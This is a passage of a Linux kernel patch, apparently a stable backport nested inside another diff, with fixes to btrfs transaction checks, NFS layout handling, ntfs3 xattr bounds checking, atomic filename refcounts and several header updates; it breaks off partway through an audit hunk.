+--- a/fs/btrfs/ctree.c
++++ b/fs/btrfs/ctree.c
+@@ -563,18 +563,30 @@ noinline int btrfs_cow_block(struct btrfs_trans_handle *trans,
+ 	u64 search_start;
+ 	int ret;
+ 
+-	if (test_bit(BTRFS_ROOT_DELETING, &root->state))
+-		btrfs_err(fs_info,
+-			"COW'ing blocks on a fs root that's being dropped");
+-
+-	if (trans->transaction != fs_info->running_transaction)
+-		WARN(1, KERN_CRIT "trans %llu running %llu\n",
+-		       trans->transid,
+-		       fs_info->running_transaction->transid);
++	if (unlikely(test_bit(BTRFS_ROOT_DELETING, &root->state))) {
++		btrfs_abort_transaction(trans, -EUCLEAN);
++		btrfs_crit(fs_info,
++		   "attempt to COW block %llu on root %llu that is being deleted",
++			   buf->start, btrfs_root_id(root));
++		return -EUCLEAN;
++	}
+ 
+-	if (trans->transid != fs_info->generation)
+-		WARN(1, KERN_CRIT "trans %llu running %llu\n",
+-		       trans->transid, fs_info->generation);
++	/*
++	 * COWing must happen through a running transaction, which always
++	 * matches the current fs generation (it's a transaction with a state
++	 * less than TRANS_STATE_UNBLOCKED). If it doesn't, then turn the fs
++	 * into error state to prevent the commit of any transaction.
++	 */
++	if (unlikely(trans->transaction != fs_info->running_transaction ||
++		     trans->transid != fs_info->generation)) {
++		btrfs_abort_transaction(trans, -EUCLEAN);
++		btrfs_crit(fs_info,
++"unexpected transaction when attempting to COW block %llu on root %llu, transaction %llu running transaction %llu fs generation %llu",
++			   buf->start, btrfs_root_id(root), trans->transid,
++			   fs_info->running_transaction->transid,
++			   fs_info->generation);
++		return -EUCLEAN;
++	}
+ 
+ 	if (!should_cow_block(trans, root, buf)) {
+ 		*cow_ret = buf;
+@@ -686,8 +698,22 @@ int btrfs_realloc_node(struct btrfs_trans_handle *trans,
+ 	int progress_passed = 0;
+ 	struct btrfs_disk_key disk_key;
+ 
+-	WARN_ON(trans->transaction != fs_info->running_transaction);
+-	WARN_ON(trans->transid != fs_info->generation);
++	/*
++	 * COWing must happen through a running transaction, which always
++	 * matches the current fs generation (it's a transaction with a state
++	 * less than TRANS_STATE_UNBLOCKED). If it doesn't, then turn the fs
++	 * into error state to prevent the commit of any transaction.
++	 */
++	if (unlikely(trans->transaction != fs_info->running_transaction ||
++		     trans->transid != fs_info->generation)) {
++		btrfs_abort_transaction(trans, -EUCLEAN);
++		btrfs_crit(fs_info,
++"unexpected transaction when attempting to reallocate parent %llu for root %llu, transaction %llu running transaction %llu fs generation %llu",
++			   parent->start, btrfs_root_id(root), trans->transid,
++			   fs_info->running_transaction->transid,
++			   fs_info->generation);
++		return -EUCLEAN;
++	}
+ 
+ 	parent_nritems = btrfs_header_nritems(parent);
+ 	blocksize = fs_info->nodesize;
+diff --git a/fs/btrfs/delayed-ref.c b/fs/btrfs/delayed-ref.c
+index 36a3debe94930..e08e3852c4788 100644
+--- a/fs/btrfs/delayed-ref.c
++++ b/fs/btrfs/delayed-ref.c
+@@ -141,24 +141,17 @@ void btrfs_update_delayed_refs_rsv(struct btrfs_trans_handle *trans)
+  * Transfer bytes to our delayed refs rsv
+  *
+  * @fs_info:   the filesystem
+- * @src:       source block rsv to transfer from
+  * @num_bytes: number of bytes to transfer
+  *
+- * This transfers up to the num_bytes amount from the src rsv to the
++ * This transfers up to the num_bytes amount, previously reserved, to the
+  * delayed_refs_rsv.  Any extra bytes are returned to the space info.
+  */
+ void btrfs_migrate_to_delayed_refs_rsv(struct btrfs_fs_info *fs_info,
+-				       struct btrfs_block_rsv *src,
+ 				       u64 num_bytes)
+ {
+ 	struct btrfs_block_rsv *delayed_refs_rsv = &fs_info->delayed_refs_rsv;
+ 	u64 to_free = 0;
+ 
+-	spin_lock(&src->lock);
+-	src->reserved -= num_bytes;
+-	src->size -= num_bytes;
+-	spin_unlock(&src->lock);
+-
+ 	spin_lock(&delayed_refs_rsv->lock);
+ 	if (delayed_refs_rsv->size > delayed_refs_rsv->reserved) {
+ 		u64 delta = delayed_refs_rsv->size -
+diff --git a/fs/btrfs/delayed-ref.h b/fs/btrfs/delayed-ref.h
+index d6304b690ec4a..712a6315e956b 100644
+--- a/fs/btrfs/delayed-ref.h
++++ b/fs/btrfs/delayed-ref.h
+@@ -383,7 +383,6 @@ void btrfs_update_delayed_refs_rsv(struct btrfs_trans_handle *trans);
+ int btrfs_delayed_refs_rsv_refill(struct btrfs_fs_info *fs_info,
+ 				  enum btrfs_reserve_flush_enum flush);
+ void btrfs_migrate_to_delayed_refs_rsv(struct btrfs_fs_info *fs_info,
+-				       struct btrfs_block_rsv *src,
+ 				       u64 num_bytes);
+ int btrfs_should_throttle_delayed_refs(struct btrfs_trans_handle *trans);
+ bool btrfs_check_space_for_delayed_refs(struct btrfs_fs_info *fs_info);
+diff --git a/fs/btrfs/extent-tree.c b/fs/btrfs/extent-tree.c
+index 08ff10a81cb90..2a7c9088fe1f8 100644
+--- a/fs/btrfs/extent-tree.c
++++ b/fs/btrfs/extent-tree.c
+@@ -1663,12 +1663,12 @@ static int run_delayed_tree_ref(struct btrfs_trans_handle *trans,
+ 		parent = ref->parent;
+ 	ref_root = ref->root;
+ 
+-	if (node->ref_mod != 1) {
++	if (unlikely(node->ref_mod != 1)) {
+ 		btrfs_err(trans->fs_info,
+-	"btree block(%llu) has %d references rather than 1: action %d ref_root %llu parent %llu",
++	"btree block %llu has %d references rather than 1: action %d ref_root %llu parent %llu",
+ 			  node->bytenr, node->ref_mod, node->action, ref_root,
+ 			  parent);
+-		return -EIO;
++		return -EUCLEAN;
+ 	}
+ 	if (node->action == BTRFS_ADD_DELAYED_REF && insert_reserved) {
+ 		BUG_ON(!extent_op || !extent_op->update_flags);
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index 9e323420c96d3..9474265ee7ea3 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -3869,7 +3869,7 @@ static void get_block_group_info(struct list_head *groups_list,
+ static long btrfs_ioctl_space_info(struct btrfs_fs_info *fs_info,
+ 				   void __user *arg)
+ {
+-	struct btrfs_ioctl_space_args space_args;
++	struct btrfs_ioctl_space_args space_args = { 0 };
+ 	struct btrfs_ioctl_space_info space;
+ 	struct btrfs_ioctl_space_info *dest;
+ 	struct btrfs_ioctl_space_info *dest_orig;
+@@ -5223,7 +5223,7 @@ static int _btrfs_ioctl_send(struct inode *inode, void __user *argp, bool compat
+ 
+ 	if (compat) {
+ #if defined(CONFIG_64BIT) && defined(CONFIG_COMPAT)
+-		struct btrfs_ioctl_send_args_32 args32;
++		struct btrfs_ioctl_send_args_32 args32 = { 0 };
+ 
+ 		ret = copy_from_user(&args32, argp, sizeof(args32));
+ 		if (ret)
+diff --git a/fs/btrfs/transaction.c b/fs/btrfs/transaction.c
+index 1193214ba8c10..60db4c3b82fa1 100644
+--- a/fs/btrfs/transaction.c
++++ b/fs/btrfs/transaction.c
+@@ -614,14 +614,14 @@ start_transaction(struct btrfs_root *root, unsigned int num_items,
+ 			reloc_reserved = true;
+ 		}
+ 
+-		ret = btrfs_block_rsv_add(fs_info, rsv, num_bytes, flush);
++		ret = btrfs_reserve_metadata_bytes(fs_info, rsv, num_bytes, flush);
+ 		if (ret)
+ 			goto reserve_fail;
+ 		if (delayed_refs_bytes) {
+-			btrfs_migrate_to_delayed_refs_rsv(fs_info, rsv,
+-							  delayed_refs_bytes);
++			btrfs_migrate_to_delayed_refs_rsv(fs_info, delayed_refs_bytes);
+ 			num_bytes -= delayed_refs_bytes;
+ 		}
++		btrfs_block_rsv_add_bytes(rsv, num_bytes, true);
+ 
+ 		if (rsv->space_info->force_alloc)
+ 			do_chunk_alloc = true;
+diff --git a/fs/btrfs/tree-log.c b/fs/btrfs/tree-log.c
+index c03ff6a5a7f6b..7c33b28c02aeb 100644
+--- a/fs/btrfs/tree-log.c
++++ b/fs/btrfs/tree-log.c
+@@ -4767,7 +4767,7 @@ static int btrfs_log_prealloc_extents(struct btrfs_trans_handle *trans,
+ 	struct extent_buffer *leaf;
+ 	int slot;
+ 	int ins_nr = 0;
+-	int start_slot;
++	int start_slot = 0;
+ 	int ret;
+ 
+ 	if (!(inode->flags & BTRFS_INODE_PREALLOC))
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index a40ebd2321d01..e62b4c139a72d 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -5139,7 +5139,7 @@ static void init_alloc_chunk_ctl_policy_regular(
+ 	ASSERT(space_info);
+ 
+ 	ctl->max_chunk_size = READ_ONCE(space_info->chunk_size);
+-	ctl->max_stripe_size = ctl->max_chunk_size;
++	ctl->max_stripe_size = min_t(u64, ctl->max_chunk_size, SZ_1G);
+ 
+ 	if (ctl->type & BTRFS_BLOCK_GROUP_SYSTEM)
+ 		ctl->devs_max = min_t(int, ctl->devs_max, BTRFS_MAX_DEVS_SYS_CHUNK);
+diff --git a/fs/fs-writeback.c b/fs/fs-writeback.c
+index d387708977a50..a5c31a479aacc 100644
+--- a/fs/fs-writeback.c
++++ b/fs/fs-writeback.c
+@@ -1522,10 +1522,15 @@ static void requeue_inode(struct inode *inode, struct bdi_writeback *wb,
+ 
+ 	if (wbc->pages_skipped) {
+ 		/*
+-		 * writeback is not making progress due to locked
+-		 * buffers. Skip this inode for now.
++		 * Writeback is not making progress due to locked buffers.
++		 * Skip this inode for now. Although having skipped pages
++		 * is odd for clean inodes, it can happen for some
++		 * filesystems so handle that gracefully.
+ 		 */
+-		redirty_tail_locked(inode, wb);
++		if (inode->i_state & I_DIRTY_ALL)
++			redirty_tail_locked(inode, wb);
++		else
++			inode_cgwb_move_to_attached(inode, wb);
+ 		return;
+ 	}
+ 
+diff --git a/fs/namei.c b/fs/namei.c
+index 4248647f1ab24..5e1c2ab2ae709 100644
+--- a/fs/namei.c
++++ b/fs/namei.c
+@@ -187,7 +187,7 @@ getname_flags(const char __user *filename, int flags, int *empty)
+ 		}
+ 	}
+ 
+-	result->refcnt = 1;
++	atomic_set(&result->refcnt, 1);
+ 	/* The empty path is special. */
+ 	if (unlikely(!len)) {
+ 		if (empty)
+@@ -248,7 +248,7 @@ getname_kernel(const char * filename)
+ 	memcpy((char *)result->name, filename, len);
+ 	result->uptr = NULL;
+ 	result->aname = NULL;
+-	result->refcnt = 1;
++	atomic_set(&result->refcnt, 1);
+ 	audit_getname(result);
+ 
+ 	return result;
+@@ -259,9 +259,10 @@ void putname(struct filename *name)
+ 	if (IS_ERR(name))
+ 		return;
+ 
+-	BUG_ON(name->refcnt <= 0);
++	if (WARN_ON_ONCE(!atomic_read(&name->refcnt)))
++		return;
+ 
+-	if (--name->refcnt > 0)
++	if (!atomic_dec_and_test(&name->refcnt))
+ 		return;
+ 
+ 	if (name->name != name->iname) {
+diff --git a/fs/nfs/flexfilelayout/flexfilelayout.c b/fs/nfs/flexfilelayout/flexfilelayout.c
+index 5c69a6e9ab3e1..81bbafab18a99 100644
+--- a/fs/nfs/flexfilelayout/flexfilelayout.c
++++ b/fs/nfs/flexfilelayout/flexfilelayout.c
+@@ -2520,9 +2520,9 @@ ff_layout_mirror_prepare_stats(struct pnfs_layout_hdr *lo,
+ 	return i;
+ }
+ 
+-static int
+-ff_layout_prepare_layoutstats(struct nfs42_layoutstat_args *args)
++static int ff_layout_prepare_layoutstats(struct nfs42_layoutstat_args *args)
+ {
++	struct pnfs_layout_hdr *lo;
+ 	struct nfs4_flexfile_layout *ff_layout;
+ 	const int dev_count = PNFS_LAYOUTSTATS_MAXDEV;
+ 
+@@ -2533,11 +2533,14 @@ ff_layout_prepare_layoutstats(struct nfs42_layoutstat_args *args)
+ 		return -ENOMEM;
+ 
+ 	spin_lock(&args->inode->i_lock);
+-	ff_layout = FF_LAYOUT_FROM_HDR(NFS_I(args->inode)->layout);
+-	args->num_dev = ff_layout_mirror_prepare_stats(&ff_layout->generic_hdr,
+-						       &args->devinfo[0],
+-						       dev_count,
+-						       NFS4_FF_OP_LAYOUTSTATS);
++	lo = NFS_I(args->inode)->layout;
++	if (lo && pnfs_layout_is_valid(lo)) {
++		ff_layout = FF_LAYOUT_FROM_HDR(lo);
++		args->num_dev = ff_layout_mirror_prepare_stats(
++			&ff_layout->generic_hdr, &args->devinfo[0], dev_count,
++			NFS4_FF_OP_LAYOUTSTATS);
++	} else
++		args->num_dev = 0;
+ 	spin_unlock(&args->inode->i_lock);
+ 	if (!args->num_dev) {
+ 		kfree(args->devinfo);
+diff --git a/fs/nfs/nfs42proc.c b/fs/nfs/nfs42proc.c
+index d903ea10410c2..5a8fe0e57a3d3 100644
+--- a/fs/nfs/nfs42proc.c
++++ b/fs/nfs/nfs42proc.c
+@@ -81,7 +81,8 @@ static int _nfs42_proc_fallocate(struct rpc_message *msg, struct file *filep,
+ 	if (status == 0) {
+ 		if (nfs_should_remove_suid(inode)) {
+ 			spin_lock(&inode->i_lock);
+-			nfs_set_cache_invalid(inode, NFS_INO_INVALID_MODE);
++			nfs_set_cache_invalid(inode,
++				NFS_INO_REVAL_FORCED | NFS_INO_INVALID_MODE);
+ 			spin_unlock(&inode->i_lock);
+ 		}
+ 		status = nfs_post_op_update_inode_force_wcc(inode,
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index e1297c6bcfbe2..5cf53def987e5 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -8875,8 +8875,6 @@ static int _nfs4_proc_exchange_id(struct nfs_client *clp, const struct cred *cre
+ 	/* Save the EXCHANGE_ID verifier session trunk tests */
+ 	memcpy(clp->cl_confirm.data, argp->verifier.data,
+ 	       sizeof(clp->cl_confirm.data));
+-	if (resp->flags & EXCHGID4_FLAG_USE_PNFS_DS)
+-		set_bit(NFS_CS_DS, &clp->cl_flags);
+ out:
+ 	trace_nfs4_exchange_id(clp, status);
+ 	rpc_put_task(task);
+diff --git a/fs/nfs/pnfs.c b/fs/nfs/pnfs.c
+index a5db5158c6345..1ffb1068216b6 100644
+--- a/fs/nfs/pnfs.c
++++ b/fs/nfs/pnfs.c
+@@ -2634,31 +2634,44 @@ pnfs_should_return_unused_layout(struct pnfs_layout_hdr *lo,
+ 	return mode == 0;
+ }
+ 
+-static int
+-pnfs_layout_return_unused_byserver(struct nfs_server *server, void *data)
++static int pnfs_layout_return_unused_byserver(struct nfs_server *server,
++					      void *data)
+ {
+ 	const struct pnfs_layout_range *range = data;
++	const struct cred *cred;
+ 	struct pnfs_layout_hdr *lo;
+ 	struct inode *inode;
++	nfs4_stateid stateid;
++	enum pnfs_iomode iomode;
++
+ restart:
+ 	rcu_read_lock();
+ 	list_for_each_entry_rcu(lo, &server->layouts, plh_layouts) {
+-		if (!pnfs_layout_can_be_returned(lo) ||
++		inode = lo->plh_inode;
++		if (!inode || !pnfs_layout_can_be_returned(lo) ||
+ 		    test_bit(NFS_LAYOUT_RETURN_REQUESTED, &lo->plh_flags))
+ 			continue;
+-		inode = lo->plh_inode;
+ 		spin_lock(&inode->i_lock);
+-		if (!pnfs_should_return_unused_layout(lo, range)) {
++		if (!lo->plh_inode ||
++		    !pnfs_should_return_unused_layout(lo, range)) {
+ 			spin_unlock(&inode->i_lock);
+ 			continue;
+ 		}
++		pnfs_get_layout_hdr(lo);
++		pnfs_set_plh_return_info(lo, range->iomode, 0);
++		if (pnfs_mark_matching_lsegs_return(lo, &lo->plh_return_segs,
++						    range, 0) != 0 ||
++		    !pnfs_prepare_layoutreturn(lo, &stateid, &cred, &iomode)) {
++			spin_unlock(&inode->i_lock);
++			rcu_read_unlock();
++			pnfs_put_layout_hdr(lo);
++			cond_resched();
++			goto restart;
++		}
+ 		spin_unlock(&inode->i_lock);
+-		inode = pnfs_grab_inode_layout_hdr(lo);
+-		if (!inode)
+-			continue;
+ 		rcu_read_unlock();
+-		pnfs_mark_layout_for_return(inode, range);
+-		iput(inode);
++		pnfs_send_layoutreturn(lo, &stateid, &cred, iomode, false);
++		pnfs_put_layout_hdr(lo);
+ 		cond_resched();
+ 		goto restart;
+ 	}
+diff --git a/fs/ntfs3/fsntfs.c b/fs/ntfs3/fsntfs.c
+index 829b62d3bb889..9c0fc3a29d0c9 100644
+--- a/fs/ntfs3/fsntfs.c
++++ b/fs/ntfs3/fsntfs.c
+@@ -2428,10 +2428,12 @@ void mark_as_free_ex(struct ntfs_sb_info *sbi, CLST lcn, CLST len, bool trim)
+ {
+ 	CLST end, i, zone_len, zlen;
+ 	struct wnd_bitmap *wnd = &sbi->used.bitmap;
++	bool dirty = false;
+ 
+ 	down_write_nested(&wnd->rw_lock, BITMAP_MUTEX_CLUSTERS);
+ 	if (!wnd_is_used(wnd, lcn, len)) {
+-		ntfs_set_state(sbi, NTFS_DIRTY_ERROR);
++		/* mark volume as dirty out of wnd->rw_lock */
++		dirty = true;
+ 
+ 		end = lcn + len;
+ 		len = 0;
+@@ -2485,6 +2487,8 @@ void mark_as_free_ex(struct ntfs_sb_info *sbi, CLST lcn, CLST len, bool trim)
+ 
+ out:
+ 	up_write(&wnd->rw_lock);
++	if (dirty)
++		ntfs_set_state(sbi, NTFS_DIRTY_ERROR);
+ }
+ 
+ /*
+diff --git a/fs/ntfs3/index.c b/fs/ntfs3/index.c
+index 495cfb37962fa..b89a33f5761ef 100644
+--- a/fs/ntfs3/index.c
++++ b/fs/ntfs3/index.c
+@@ -729,6 +729,9 @@ static struct NTFS_DE *hdr_find_e(const struct ntfs_index *indx,
+ 	u32 total = le32_to_cpu(hdr->total);
+ 	u16 offs[128];
+ 
++	if (unlikely(!cmp))
++		return NULL;
++
+ fill_table:
+ 	if (end > total)
+ 		return NULL;
+diff --git a/fs/ntfs3/xattr.c b/fs/ntfs3/xattr.c
+index f5d3092f478c5..df15e00c2a3a0 100644
+--- a/fs/ntfs3/xattr.c
++++ b/fs/ntfs3/xattr.c
+@@ -209,7 +209,8 @@ static ssize_t ntfs_list_ea(struct ntfs_inode *ni, char *buffer,
+ 	size = le32_to_cpu(info->size);
+ 
+ 	/* Enumerate all xattrs. */
+-	for (ret = 0, off = 0; off < size; off += ea_size) {
++	ret = 0;
++	for (off = 0; off + sizeof(struct EA_FULL) < size; off += ea_size) {
+ 		ea = Add2Ptr(ea_all, off);
+ 		ea_size = unpacked_ea_size(ea);
+ 
+@@ -217,6 +218,10 @@ static ssize_t ntfs_list_ea(struct ntfs_inode *ni, char *buffer,
+ 			break;
+ 
+ 		if (buffer) {
++			/* Check if we can use field ea->name */
++			if (off + ea_size > size)
++				break;
++
+ 			if (ret + ea->name_len + 1 > bytes_per_buffer) {
+ 				err = -ERANGE;
+ 				goto out;
+diff --git a/fs/overlayfs/copy_up.c b/fs/overlayfs/copy_up.c
+index e6d711f42607b..86d4b6975dbcb 100644
+--- a/fs/overlayfs/copy_up.c
++++ b/fs/overlayfs/copy_up.c
+@@ -300,7 +300,7 @@ static int ovl_set_timestamps(struct ovl_fs *ofs, struct dentry *upperdentry,
+ {
+ 	struct iattr attr = {
+ 		.ia_valid =
+-		     ATTR_ATIME | ATTR_MTIME | ATTR_ATIME_SET | ATTR_MTIME_SET,
++		     ATTR_ATIME | ATTR_MTIME | ATTR_ATIME_SET | ATTR_MTIME_SET | ATTR_CTIME,
+ 		.ia_atime = stat->atime,
+ 		.ia_mtime = stat->mtime,
+ 	};
+diff --git a/include/linux/fprobe.h b/include/linux/fprobe.h
+index 1c2bde0ead736..678f741a7b330 100644
+--- a/include/linux/fprobe.h
++++ b/include/linux/fprobe.h
+@@ -13,6 +13,8 @@
+  * @nmissed: The counter for missing events.
+  * @flags: The status flag.
+  * @rethook: The rethook data structure. (internal data)
++ * @entry_data_size: The private data storage size.
++ * @nr_maxactive: The max number of active functions.
+  * @entry_handler: The callback function for function entry.
+  * @exit_handler: The callback function for function exit.
+  */
+@@ -29,9 +31,13 @@ struct fprobe {
+ 	unsigned long		nmissed;
+ 	unsigned int		flags;
+ 	struct rethook		*rethook;
++	size_t			entry_data_size;
++	int			nr_maxactive;
+ 
+-	void (*entry_handler)(struct fprobe *fp, unsigned long entry_ip, struct pt_regs *regs);
+-	void (*exit_handler)(struct fprobe *fp, unsigned long entry_ip, struct pt_regs *regs);
++	void (*entry_handler)(struct fprobe *fp, unsigned long entry_ip,
++			      struct pt_regs *regs, void *entry_data);
++	void (*exit_handler)(struct fprobe *fp, unsigned long entry_ip,
++			     struct pt_regs *regs, void *entry_data);
+ };
+ 
+ /* This fprobe is soft-disabled. */
+diff --git a/include/linux/fs.h b/include/linux/fs.h
+index 26ea1a0a59a10..dc745317e1bdb 100644
+--- a/include/linux/fs.h
++++ b/include/linux/fs.h
+@@ -2735,7 +2735,7 @@ struct audit_names;
+ struct filename {
+ 	const char		*name;	/* pointer to actual string */
+ 	const __user char	*uptr;	/* original userland pointer */
+-	int			refcnt;
++	atomic_t		refcnt;
+ 	struct audit_names	*aname;
+ 	const char		iname[];
+ };
+diff --git a/include/linux/hid.h b/include/linux/hid.h
+index 784dd6b6046eb..58f5ab29c11a7 100644
+--- a/include/linux/hid.h
++++ b/include/linux/hid.h
+@@ -312,6 +312,7 @@ struct hid_item {
+ #define HID_DG_LATENCYMODE	0x000d0060
+ 
+ #define HID_BAT_ABSOLUTESTATEOFCHARGE	0x00850065
++#define HID_BAT_CHARGING		0x00850044
+ 
+ #define HID_VD_ASUS_CUSTOM_MEDIA_KEYS	0xff310076
+ 
+@@ -612,6 +613,7 @@ struct hid_device {							/* device report descriptor */
+ 	__s32 battery_max;
+ 	__s32 battery_report_type;
+ 	__s32 battery_report_id;
++	__s32 battery_charge_status;
+ 	enum hid_battery_status battery_status;
+ 	bool battery_avoid_query;
+ 	ktime_t battery_ratelimit_time;
+diff --git a/include/linux/iio/iio.h b/include/linux/iio/iio.h
+index f0ec8a5e5a7a9..9d3bd6379eb87 100644
+--- a/include/linux/iio/iio.h
++++ b/include/linux/iio/iio.h
+@@ -629,6 +629,8 @@ int __devm_iio_device_register(struct device *dev, struct iio_dev *indio_dev,
+ int iio_push_event(struct iio_dev *indio_dev, u64 ev_code, s64 timestamp);
+ int iio_device_claim_direct_mode(struct iio_dev *indio_dev);
+ void iio_device_release_direct_mode(struct iio_dev *indio_dev);
++int iio_device_claim_buffer_mode(struct iio_dev *indio_dev);
++void iio_device_release_buffer_mode(struct iio_dev *indio_dev);
+ 
+ extern struct bus_type iio_bus_type;
+ 
+diff --git a/include/linux/kallsyms.h b/include/linux/kallsyms.h
+index 649faac31ddb1..0cd33be7142ad 100644
+--- a/include/linux/kallsyms.h
++++ b/include/linux/kallsyms.h
+@@ -69,6 +69,8 @@ static inline void *dereference_symbol_descriptor(void *ptr)
+ int kallsyms_on_each_symbol(int (*fn)(void *, const char *, struct module *,
+ 				      unsigned long),
+ 			    void *data);
++int kallsyms_on_each_match_symbol(int (*fn)(void *, unsigned long),
++				  const char *name, void *data);
+ 
+ /* Lookup the address for a symbol. Returns 0 if not found. */
+ unsigned long kallsyms_lookup_name(const char *name);
+@@ -168,6 +170,12 @@ static inline int kallsyms_on_each_symbol(int (*fn)(void *, const char *, struct
+ {
+ 	return -EOPNOTSUPP;
+ }
++
++static inline int kallsyms_on_each_match_symbol(int (*fn)(void *, unsigned long),
++						const char *name, void *data)
++{
++	return -EOPNOTSUPP;
++}
+ #endif /*CONFIG_KALLSYMS*/
+ 
+ static inline void print_ip_sym(const char *loglvl, unsigned long ip)
+diff --git a/include/linux/perf_event.h b/include/linux/perf_event.h
+index 63fae3c7ae430..1578a4de1f3cb 100644
+--- a/include/linux/perf_event.h
++++ b/include/linux/perf_event.h
+@@ -694,6 +694,7 @@ struct perf_event {
+ 	/* The cumulative AND of all event_caps for events in this group. */
+ 	int				group_caps;
+ 
++	unsigned int			group_generation;
+ 	struct perf_event		*group_leader;
+ 	struct pmu			*pmu;
+ 	void				*pmu_private;
+diff --git a/include/net/bluetooth/hci_core.h b/include/net/bluetooth/hci_core.h
+index ddbcbf9ccb2ce..583aebd8c1e01 100644
+--- a/include/net/bluetooth/hci_core.h
++++ b/include/net/bluetooth/hci_core.h
+@@ -348,7 +348,7 @@ struct hci_dev {
+ 	struct list_head list;
+ 	struct mutex	lock;
+ 
+-	char		name[8];
++	const char	*name;
+ 	unsigned long	flags;
+ 	__u16		id;
+ 	__u8		bus;
+diff --git a/include/net/bluetooth/hci_mon.h b/include/net/bluetooth/hci_mon.h
+index 2d5fcda1bcd05..082f89531b889 100644
+--- a/include/net/bluetooth/hci_mon.h
++++ b/include/net/bluetooth/hci_mon.h
+@@ -56,7 +56,7 @@ struct hci_mon_new_index {
+ 	__u8		type;
+ 	__u8		bus;
+ 	bdaddr_t	bdaddr;
+-	char		name[8];
++	char		name[8] __nonstring;
+ } __packed;
+ #define HCI_MON_NEW_INDEX_SIZE 16
+ 
+diff --git a/include/net/ip_fib.h b/include/net/ip_fib.h
+index f0c13864180e2..15de07d365405 100644
+--- a/include/net/ip_fib.h
++++ b/include/net/ip_fib.h
+@@ -154,6 +154,7 @@ struct fib_info {
+ 	int			fib_nhs;
+ 	bool			fib_nh_is_v6;
+ 	bool			nh_updated;
++	bool			pfsrc_removed;
+ 	struct nexthop		*nh;
+ 	struct rcu_head		rcu;
+ 	struct fib_nh		fib_nh[];
+diff --git a/include/net/netns/xfrm.h b/include/net/netns/xfrm.h
+index bd7c3be4af5d7..423b52eca908d 100644
+--- a/include/net/netns/xfrm.h
++++ b/include/net/netns/xfrm.h
+@@ -50,6 +50,7 @@ struct netns_xfrm {
+ 	struct list_head	policy_all;
+ 	struct hlist_head	*policy_byidx;
+ 	unsigned int		policy_idx_hmask;
++	unsigned int		idx_generator;
+ 	struct hlist_head	policy_inexact[XFRM_POLICY_MAX];
+ 	struct xfrm_policy_hash	policy_bydst[XFRM_POLICY_MAX];
+ 	unsigned int		policy_count[XFRM_POLICY_MAX * 2];
+diff --git a/include/net/sock.h b/include/net/sock.h
+index fe695e8bfe289..a1fcbb2a8a2ce 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -333,7 +333,7 @@ struct sk_filter;
+   *	@sk_cgrp_data: cgroup data for this cgroup
+   *	@sk_memcg: this socket's memory cgroup association
+   *	@sk_write_pending: a write to stream socket waits to start
+-  *	@sk_wait_pending: number of threads blocked on this socket
++  *	@sk_disconnects: number of disconnect operations performed on this sock
+   *	@sk_state_change: callback to indicate change in the state of the sock
+   *	@sk_data_ready: callback to indicate there is data to be processed
+   *	@sk_write_space: callback to indicate there is bf sending space available
+@@ -426,7 +426,7 @@ struct sock {
+ 	unsigned int		sk_napi_id;
+ #endif
+ 	int			sk_rcvbuf;
+-	int			sk_wait_pending;
++	int			sk_disconnects;
+ 
+ 	struct sk_filter __rcu	*sk_filter;
+ 	union {
+@@ -1185,8 +1185,7 @@ static inline void sock_rps_reset_rxhash(struct sock *sk)
+ }
+ 
+ #define sk_wait_event(__sk, __timeo, __condition, __wait)		\
+-	({	int __rc;						\
+-		__sk->sk_wait_pending++;				\
++	({	int __rc, __dis = __sk->sk_disconnects;			\
+ 		release_sock(__sk);					\
+ 		__rc = __condition;					\
+ 		if (!__rc) {						\
+@@ -1196,8 +1195,7 @@ static inline void sock_rps_reset_rxhash(struct sock *sk)
+ 		}							\
+ 		sched_annotate_sleep();					\
+ 		lock_sock(__sk);					\
+-		__sk->sk_wait_pending--;				\
+-		__rc = __condition;					\
++		__rc = __dis == __sk->sk_disconnects ? __condition : -EPIPE; \
+ 		__rc;							\
+ 	})
+ 
+diff --git a/include/net/tcp.h b/include/net/tcp.h
+index 9ebb54122bb71..548c75c8a34c7 100644
+--- a/include/net/tcp.h
++++ b/include/net/tcp.h
+@@ -141,6 +141,9 @@ void tcp_time_wait(struct sock *sk, int state, int timeo);
+ #define TCP_RTO_MAX	((unsigned)(120*HZ))
+ #define TCP_RTO_MIN	((unsigned)(HZ/5))
+ #define TCP_TIMEOUT_MIN	(2U) /* Min timeout for TCP timers in jiffies */
++
++#define TCP_TIMEOUT_MIN_US (2*USEC_PER_MSEC) /* Min TCP timeout in microsecs */
++
+ #define TCP_TIMEOUT_INIT ((unsigned)(1*HZ))	/* RFC6298 2.1 initial RTO value	*/
+ #define TCP_TIMEOUT_FALLBACK ((unsigned)(3*HZ))	/* RFC 1122 initial RTO value, now
+ 						 * used as a fallback RTO for the
+diff --git a/include/trace/events/neigh.h b/include/trace/events/neigh.h
+index 5eaa1fa991715..833143d0992e0 100644
+--- a/include/trace/events/neigh.h
++++ b/include/trace/events/neigh.h
+@@ -39,7 +39,6 @@ TRACE_EVENT(neigh_create,
+ 	),
+ 
+ 	TP_fast_assign(
+-		struct in6_addr *pin6;
+ 		__be32 *p32;
+ 
+ 		__entry->family = tbl->family;
+@@ -47,7 +46,6 @@ TRACE_EVENT(neigh_create,
+ 		__entry->entries = atomic_read(&tbl->gc_entries);
+ 		__entry->created = n != NULL;
+ 		__entry->gc_exempt = exempt_from_gc;
+-		pin6 = (struct in6_addr *)__entry->primary_key6;
+ 		p32 = (__be32 *)__entry->primary_key4;
+ 
+ 		if (tbl->family == AF_INET)
+@@ -57,6 +55,8 @@ TRACE_EVENT(neigh_create,
+ 
+ #if IS_ENABLED(CONFIG_IPV6)
+ 		if (tbl->family == AF_INET6) {
++			struct in6_addr *pin6;
++
+ 			pin6 = (struct in6_addr *)__entry->primary_key6;
+ 			*pin6 = *(struct in6_addr *)pkey;
+ 		}
+diff --git a/kernel/auditsc.c b/kernel/auditsc.c
+index a2240f54fc224..c5f41fc75d543 100644
+--- a/kernel/auditsc.c
++++ b/kernel/auditsc.c
+@@ -2208,7 +2208,7 @@ __audit_reusename(const __user char *uptr)
+ 		if (!n->name)
+ 			continue;
+ 		if (n->name->uptr == uptr) {
+-			n->name->refcnt++;
